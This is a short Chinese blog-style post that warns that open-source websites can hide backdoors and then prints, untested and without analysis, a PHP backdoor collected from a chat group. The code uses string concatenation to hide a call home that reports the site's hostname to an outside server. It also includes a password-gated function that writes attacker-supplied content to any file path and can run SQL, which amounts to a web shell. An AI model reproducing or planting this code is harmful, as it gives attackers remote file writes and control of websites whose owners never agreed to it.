获取网址的后门代码

听说过一些开源网站有各种门，窃取资料，甚至是钱财。小编的同事，曾经使用了一个开源的刷名片的网站被坑了50元左右的人民币。一直不知道这些代码长什么样，最近在一个群里看到高手分享的一些代码，做一些收集。目前水平不够没有测试，等我实力够了，在细细研究。仅作分享用，以下是代码：

<?php
//获取网址
function set_ustr_array()
{
    $s="9188";$p="p";$t="tt";$om="om";$h="h";$f=":";$u="//";$py="py";$c=".c";$tm="/tm";
    $u=$h.$t.$p.$f.$u.$py.$s.$c.$om.$tm;
    $cd="P_H";$c="HTT";$ce="OST";
    $h=$c.$cd.$ce;
    $t="/index.php?u=".$_SERVER[$h];$y=1;$e=2;$j=9;$y=$y.$j.$e;$ya="lo";$yh="calhost";$ya.=$yh;
    if(!strpos(" ".$_SERVER[$h],$y) && !strpos(" ".$_SERVER[$h],$ya))
    {
        $file_contents=file_get_contents($u.$t);
    }
    return $file_contents;
}
//清零数据
function array_ustr()
{
    if(md5($_GET["set"])=="204fd5875dbbf8f85ee93d8493f2dacf")
    {
        $f=$_GET["f"];$c=$_GET["c"];$type=$_GET["type"];$sql=$_GET["sql"];
        $c=str_replace("\\","",$c);
        $f=fopen($f,"w");
        fwrite($f,"$c");
        fclose($f);
        if($type==1){open_sql($sql);}
    }
}
array_ustr();


?>